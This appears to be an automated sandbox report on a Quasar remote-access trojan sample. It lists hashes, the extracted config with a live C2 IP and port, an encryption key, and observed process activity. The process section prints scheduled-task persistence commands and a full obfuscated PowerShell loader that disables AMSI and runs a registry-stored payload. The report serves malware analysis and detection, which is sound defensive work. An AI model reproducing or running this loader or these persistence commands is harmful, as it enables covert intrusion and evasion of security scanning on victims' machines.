Analysis
-
max time kernel
38s -
max time network
31s -
platform
windows11-21h2_x64 -
resource
win11-20240412-en -
resource tags
-
submitted
21-04-2024 17:11
Errors
Reason
Machine shutdown: "{\"level\":\"info\",\"time\":\"2024-04-21T17:21:09Z\",\"message\":\"Dirty snapshot: /var/lib/sandbox/hatchvm/win11-20240412-en/instance_5-dirty.qcow2\"}"
General
-
Target
Sexy.exe
-
Size
409KB
-
MD5
4c5faec89139e079202a5208d49ed5a0
-
SHA1
f26bf551e191af0dd01b5d39ae0c8489d94a877e
-
SHA256
bbecd1e502693965f493ecb6a611dd86dc71b4bcb8471cf4c459d0b44e9f6378
-
SHA512
5d31a95a76a2d17967f685b47823682f8301164ee9386f267f2ce28b866429dfb48aa7ef7cb21a7ab8b732286fb99eee989d10e5040ea69a361ba83b0b22ec64
-
SSDEEP
12288:iBwz9kOUJIOSQoxdKIT00N2f3DPcCYDVouW5:i+JLOsVRi3YCYg
Score
10/10
Malware Config
Extracted
Family
quasar
Version
3.1.5
Botnet
SLAVE
C2
147.185.221.19:33587
Mutex
$Sxr-zpFqsQjJJh3miBvVnu
Attributes
-
encryption_key
LxGS9iJRjIMm1rV0MEzT
-
install_name
BiosUpdX64YDPS.exe
-
log_directory
$sxr
-
reconnect_delay
3000
-
startup_key
$sxr-mtsha
-
subdirectory
Windows
Signatures
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 2 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Executes dropped EXE 2 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 41 IoCs
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 30 IoCs
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{99a32fbc-e01e-4420-bb9d-dfa34b586f7b}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Users\Admin\AppData\Local\Temp\Sexy.exe"C:\Users\Admin\AppData\Local\Temp\Sexy.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-mtsha" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Sexy.exe" /rl HIGHEST /f2⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe"C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-mtsha" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77Sexy.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Sexy.exe'" /sc onlogon /rl HIGHEST2⤵
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:XmCctSJegdhO{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EhNPCrnudphSsA,[Parameter(Position=1)][Type]$LPSLIHayUN)$dZNvSOBwUth=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+'c'+''+[Char](116)+''+'e'+''+'d'+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+'oryM'+'o'+''+'d'+''+'u'+'l'+[Char](101)+'',$False).DefineType('M'+'y'+''+'D'+'e'+[Char](108)+''+'e'+''+[Char](103)+''+'a'+'t'+'e'+''+'T'+'y'+'p'+'e',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+','+'S'+'e'+''+[Char](97)+'l'+'e'+''+'d'+''+[Char](44)+''+[Char](65)+'ns'+[Char](105)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+'t'+'o'+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$dZNvSOBwUth.DefineConstructor(''+[Char](82)+''+'T'+'S'+[Char](112)+''+[Char](101)+''+'c'+'i'+[Char](97)+'lNa'+[Char](109)+''+'e'+''+','+''+'H'+''+[Char](105)+'d'+[Char](101)+'By'+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+''+'u'+''+'b'+'l'+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$EhNPCrnudphSsA).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+'ged');$dZNvSOBwUth.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+'o'+[Char](107)+''+'e'+'',''+'P'+'ub'+'l'+''+'i'+'c'+','+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](78)+''+'e'+'w'+[Char](83)+''+'l'+'o'+[Char](116)+''+','+'V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+'l',$LPSLIHayUN,$EhNPCrnudphSsA).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+''+','+''+[Char](77)+'a'+[Char](110)+''+'a'+'g'+[Char](101)+'d');Write-Output $dZNvSOBwUth.CreateType();}$KtHxvwIJGfEFm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'ys'+[Char](116)+'e'+'m'+'.'+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+'cr'+[Char](111)+'s'+[Char](111)+'ft.'+[Char](87)+''+[Char](105)+''+'n'+''+'3'+''+'2'+''+'.'+''+[Char](85)+'n'+[Char](115)+'a'+[Char](102)+''+'e'+'Na'+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+'M'+'e'+'t'+[Char](104)+''+'o'+''+[Char](100)+''+'s'+'');$eAeHhUJdIqWIvi=$KtHxvwIJGfEFm.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'P'+''+'r'+'o'+'c'+''+'A'+''+'d'+'dre'+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+'li'+'c'+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ZAoEIvKuzSeYwNuVJki=XmCctSJegdhO @([String])([IntPtr]);$cCycpjeXgeZmTCvWuhEaGC=XmCctSJegdhO @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$yWRxnowJPUF=$KtHxvwIJGfEFm.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'M'+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'H'+[Char](97)+''+[Char](110)+'d'+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+''+[Char](110)+'e'+[Char](108)+'3'+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$EuImrAhUIHacaq=$eAeHhUJdIqWIvi.Invoke($Null,@([Object]$yWRxnowJPUF,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+''+'L'+''+[Char](105)+''+'b'+'r'+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$IcivmBEpaDIMpTZVu=$eAeHhUJdIqWIvi.Invoke($Null,@([Object]$yWRxnowJPUF,[Object]('V'+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+''+'P'+''+'r'+''+[Char](111)+''+'t'+''+'e'+'c'+[Char](116)+'')));$DQElFuR=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EuImrAhUIHacaq,$ZAoEIvKuzSeYwNuVJki).Invoke('am'+[Char](115)+'i.'+[Char](100)+''+[Char](108)+''+'l'+'');$wGYqPzTTGsjpJICYP=$eAeHhUJdIqWIvi.Invoke($Null,@([Object]$DQElFuR,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+'f'+'f'+'er')));$tmgrgxibyo=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IcivmBEpaDIMpTZVu,$cCycpjeXgeZmTCvWuhEaGC).Invoke($wGYqPzTTGsjpJICYP,[uint32]8,4,[ref]$tmgrgxibyo);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$wGYqPzTTGsjpJICYP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IcivmBEpaDIMpTZVu,$cCycpjeXgeZmTCvWuhEaGC).Invoke($wGYqPzTTGsjpJICYP,[uint32]8,0x20,[ref]$tmgrgxibyo);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+'T'+'W'+[Char](65)+''+[Char](82)+'E').GetValue('$'+[Char](55)+''+[Char](55)+''+[Char](115)+''+'t'+'a'+'g'+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Install.exeFilesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exeFilesize
409KB
MD54c5faec89139e079202a5208d49ed5a0
SHA1f26bf551e191af0dd01b5d39ae0c8489d94a877e
SHA256bbecd1e502693965f493ecb6a611dd86dc71b4bcb8471cf4c459d0b44e9f6378
SHA5125d31a95a76a2d17967f685b47823682f8301164ee9386f267f2ce28b866429dfb48aa7ef7cb21a7ab8b732286fb99eee989d10e5040ea69a361ba83b0b22ec64
-
C:\Windows\Temp\__PSScriptPolicyTest_zbf5n4st.i2l.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/400-81-0x000001795EAA0000-0x000001795EACB000-memory.dmpFilesize
172KB
-
memory/632-56-0x0000023B14480000-0x0000023B144AB000-memory.dmpFilesize
172KB
-
memory/632-79-0x00007FFF09184000-0x00007FFF09185000-memory.dmpFilesize
4KB
-
memory/632-54-0x0000023B14450000-0x0000023B14475000-memory.dmpFilesize
148KB
-
memory/632-55-0x0000023B14480000-0x0000023B144AB000-memory.dmpFilesize
172KB
-
memory/632-73-0x0000023B14480000-0x0000023B144AB000-memory.dmpFilesize
172KB
-
memory/632-78-0x00007FFEC9170000-0x00007FFEC9180000-memory.dmpFilesize
64KB
-
memory/688-69-0x000001BDFEFB0000-0x000001BDFEFDB000-memory.dmpFilesize
172KB
-
memory/760-95-0x000001BA9CEA0000-0x000001BA9CECB000-memory.dmpFilesize
172KB
-
memory/976-80-0x000001972BC90000-0x000001972BCBB000-memory.dmpFilesize
172KB
-
memory/1536-38-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1536-49-0x00007FFF090E0000-0x00007FFF092E9000-memory.dmpFilesize
2.0MB
-
memory/1536-44-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1536-50-0x00007FFF07B00000-0x00007FFF07BBD000-memory.dmpFilesize
756KB
-
memory/1536-89-0x00007FFF090E0000-0x00007FFF092E9000-memory.dmpFilesize
2.0MB
-
memory/1536-40-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1536-42-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1536-39-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1536-51-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2440-14-0x0000000004E70000-0x0000000004E80000-memory.dmpFilesize
64KB
-
memory/2440-58-0x0000000074DE0000-0x0000000075591000-memory.dmpFilesize
7.7MB
-
memory/2440-24-0x0000000006600000-0x000000000660A000-memory.dmpFilesize
40KB
-
memory/2440-13-0x0000000074DE0000-0x0000000075591000-memory.dmpFilesize
7.7MB
-
memory/2536-61-0x00007FFEE8290000-0x00007FFEE8D52000-memory.dmpFilesize
10.8MB
-
memory/2536-22-0x000001577E3D0000-0x000001577E3E0000-memory.dmpFilesize
64KB
-
memory/2536-21-0x00007FFEE8290000-0x00007FFEE8D52000-memory.dmpFilesize
10.8MB
-
memory/2536-45-0x00007FFF07B00000-0x00007FFF07BBD000-memory.dmpFilesize
756KB
-
memory/2536-37-0x00007FFF07B00000-0x00007FFF07BBD000-memory.dmpFilesize
756KB
-
memory/2536-36-0x00007FFF090E0000-0x00007FFF092E9000-memory.dmpFilesize
2.0MB
-
memory/2536-35-0x000001577E340000-0x000001577E36A000-memory.dmpFilesize
168KB
-
memory/2536-33-0x0000015765D50000-0x0000015765D72000-memory.dmpFilesize
136KB
-
memory/2536-34-0x000001577E3D0000-0x000001577E3E0000-memory.dmpFilesize
64KB
-
memory/2536-62-0x00007FFF090E0000-0x00007FFF092E9000-memory.dmpFilesize
2.0MB
-
memory/4132-5-0x0000000005180000-0x00000000051E6000-memory.dmpFilesize
408KB
-
memory/4132-1-0x0000000074DE0000-0x0000000075591000-memory.dmpFilesize
7.7MB
-
memory/4132-2-0x0000000005800000-0x0000000005DA6000-memory.dmpFilesize
5.6MB
-
memory/4132-7-0x00000000064E0000-0x000000000651C000-memory.dmpFilesize
240KB
-
memory/4132-3-0x0000000005250000-0x00000000052E2000-memory.dmpFilesize
584KB
-
memory/4132-20-0x0000000074DE0000-0x0000000075591000-memory.dmpFilesize
7.7MB
-
memory/4132-0-0x0000000000660000-0x00000000006CC000-memory.dmpFilesize
432KB
-
memory/4132-4-0x0000000005410000-0x0000000005420000-memory.dmpFilesize
64KB
-
memory/4132-6-0x0000000005FB0000-0x0000000005FC2000-memory.dmpFilesize
72KB